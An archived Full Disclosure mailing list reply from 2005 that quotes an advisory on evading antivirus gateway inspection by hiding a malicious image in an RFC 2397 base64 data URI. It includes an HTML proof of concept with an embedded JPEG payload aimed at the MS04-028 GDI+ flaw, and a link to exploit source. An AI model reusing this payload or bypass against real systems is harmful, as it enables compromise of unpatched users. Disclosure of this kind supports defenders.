Full Disclosure mailing list archives

RE: Multi-vendor AV gateway image inspection bypassvulnerability

From: "Mark Senior" <Mark.Senior () gov ab ca>
Date: Tue, 11 Jan 2005 13:22:45 -0700

Trend Micro OfficeScan client (version 6.5, virus definitions from 10
Jan 2005) didn't catch it in my case.

I copied the html section from the original message straight to a text
file and scanned that.  I suppose it's possible some text wrapping
munged the original posting

Cheers
Mark


-----Original Message-----
From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Danny
Sent: January 11, 2005 12:14
To: Darren Bounds
Cc: bugs () securitytracker com; vulnwatch () vulnwatch org;
bugtraq () securityfocus com; list () securiteam com;
full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Multi-vendor AV gateway image inspection
bypassvulnerability

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<dbounds () intrusense com> wrote:

IPS) inspection of HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding 
image content within the URL scheme. A remote attack may encode a 
malicious image within the body of an HTML formatted document to 
circumvent content inspection.

For example:

http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image 
that will attempt (and fail without tweaking) to exploit the Microsoft

MS04-028 GDI+ vulnerability.
The image itself is detected
by all AV gateway engines tested (Trend, Sophos and McAfee), however, 
when the same image is base64 encoded using the technique described in

RFC 2397 (documented below), inspection is not performed and is 
delivered rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL 
scheme; Firefox, Safari, Mozilla and Opera do and will render the data

and thus successfully execute the payload if the necessary OS and/or 
application patches have not been applied.

## BEGIN HTML ##

<html>
<body>
<img
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
/X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBw
kJ 
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
/b 
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
Iy 
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAA
AA 
AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMo
GR 
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
Rl 
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
bH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAA
yMnK0tPU1dbX2Nna4eLj5OXm5+AA
AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQ
gU 
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
Nk 
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8
TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD/
xsfIycrS09TV1tfY2dri4+/
Z">
</body>
</html>

## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently

known image vulnerabilities are and have been for several months.  If 
you have not yet applied them, you have your own negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez their assistance in 
platform testing.


I believe TrendMicro's OfficeScan (client-server scanner) will catch it,
but I am not sure about their gateway device. What was their response?

...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

This email and any files transmitted with it are confidential and intended solely for the use of the individual or 
entity to whom they are addressed. If you have received this email in error please notify the system manager. This 
message contains confidential information and is intended only for the individual named. If you are not the named 
addressee you should not disseminate, distribute or copy this e-mail.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

RE: Multi-vendor AV gateway image inspection bypassvulnerability Mark Senior (Jan 11)